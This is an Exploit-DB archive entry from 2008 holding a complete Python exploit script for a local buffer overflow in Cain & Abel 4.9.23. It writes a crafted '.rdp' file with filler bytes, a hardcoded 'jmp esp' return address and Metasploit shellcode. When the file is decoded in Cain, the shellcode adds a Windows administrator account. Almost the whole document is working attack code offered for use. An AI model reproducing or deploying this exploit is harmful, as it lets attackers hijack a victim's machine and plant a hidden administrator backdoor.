Cain & Abel 4.9.23 - '.rdp' Local Buffer Overflow

EDB-ID:

7329




Platform:

Windows

Date:

2008-12-03


#exploit.py
print ""
print "                 !R4Q!4N H4CK3R"
print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
print "By:Encrypt3d.M!nd"
print "encrypt3d.blogspot.com"
print "######################################################"
print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
print "This is exploit for my PoC"
print "Tested on:Windows Xp Sp3 Patched"
print "This exploit will Create File(.rdp) and when decoding"
print "The file with Cain(Remote Desktop Password Decoder)"
print "Will Add administrator user(user) with password(pass)"
print ""

# win32_adduser -  PASS=pass EXITFUNC=seh USER=user Size=232
Encoder=PexFnstenvSub http://metasploit.com

shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46"
shellcode+= "\xcd\x10\x60\x83\xeb\xfc\xe2\xf4\xba\x25\x54\x60\x46\xcd\x9b\x25"
shellcode+= "\x7a\x46\x6c\x65\x3e\xcc\xff\xeb\x09\xd5\x9b\x3f\x66\xcc\xfb\x29"
shellcode+= "\xcd\xf9\x9b\x61\xa8\xfc\xd0\xf9\xea\x49\xd0\x14\x41\x0c\xda\x6d"
shellcode+= "\x47\x0f\xfb\x94\x7d\x99\x34\x64\x33\x28\x9b\x3f\x62\xcc\xfb\x06"
shellcode+= "\xcd\xc1\x5b\xeb\x19\xd1\x11\x8b\xcd\xd1\x9b\x61\xad\x44\x4c\x44"
shellcode+= "\x42\x0e\x21\xa0\x22\x46\x50\x50\xc3\x0d\x68\x6c\xcd\x8d\x1c\xeb"
shellcode+= "\x36\xd1\xbd\xeb\x2e\xc5\xfb\x69\xcd\x4d\xa0\x60\x46\xcd\x9b\x08"
shellcode+= "\x7a\x92\x21\x96\x26\x9b\x99\x98\xc5\x0d\x6b\x30\x2e\x3d\x9a\x64"
shellcode+= "\x19\xa5\x88\x9e\xcc\xc3\x47\x9f\xa1\xae\x7d\x04\x68\xa8\x68\x05"
shellcode+= "\x66\xe2\x73\x40\x28\xa8\x64\x40\x33\xbe\x75\x12\x66\xb8\x63\x05"
shellcode+= "\x34\xed\x60\x01\x35\xbe\x30\x4f\x07\x89\x54\x40\x60\xeb\x30\x0e"
shellcode+= "\x23\xb9\x30\x0c\x29\xae\x71\x0c\x21\xbf\x7f\x15\x36\xed\x51\x04"
shellcode+= "\x2b\xa4\x7e\x09\x35\xb9\x62\x01\x32\xa2\x62\x13\x66\xb8\x63\x05"
shellcode+= "\x34\xed\x3f\x21\x02\x89\x10\x60";

# and if you want to test it..this shellcode will open calc.exe
#shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"
#shellcode+= "\xab\x63\x3d\x83\xeb\xfc\xe2\xf4\x4e\x43\x27\x3d\xb2\xab\xe8\x78"
#shellcode+= "\x8e\x20\x1f\x38\xca\xaa\x8c\xb6\xfd\xb3\xe8\x62\x92\xaa\x88\x74"
#shellcode+= "\x39\x9f\xe8\x3c\x5c\x9a\xa3\xa4\x1e\x2f\xa3\x49\xb5\x6a\xa9\x30"
#shellcode+= "\xb3\x69\x88\xc9\x89\xff\x47\x39\xc7\x4e\xe8\x62\x96\xaa\x88\x5b"
#shellcode+= "\x39\xa7\x28\xb6\xed\xb7\x62\xd6\x39\xb7\xe8\x3c\x59\x22\x3f\x19"
#shellcode+= "\xb6\x68\x52\xfd\xd6\x20\x23\x0d\x37\x6b\x1b\x31\x39\xeb\x6f\xb6"
#shellcode+= "\xc2\xb7\xce\xb6\xda\xa3\x88\x34\x39\x2b\xd3\x3d\xb2\xab\xe8\x55"
#shellcode+= "\x8e\xf4\x52\xcb\xd2\xfd\xea\xc5\x31\x6b\x18\x6d\xda\x5b\xe9\x39"
#shellcode+= "\xed\xc3\xfb\xc3\x38\xa5\x34\xc2\x55\xc8\x02\x51\xd1\x85\x06\x45"
#shellcode+= "\xd7\xab\x63\x3d";

eip = "\xB7\x2F\x49\x7E" #user32.dll jmp esp 0x7E492FB7

chars = "E"*8206
print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t"
print ""
file = open('cain.rdp','w')
file.write (chars+eip+eip+"\x90"*10+shellcode)
file.close()
print "D0NE!"

# milw0rm.com [2008-12-03]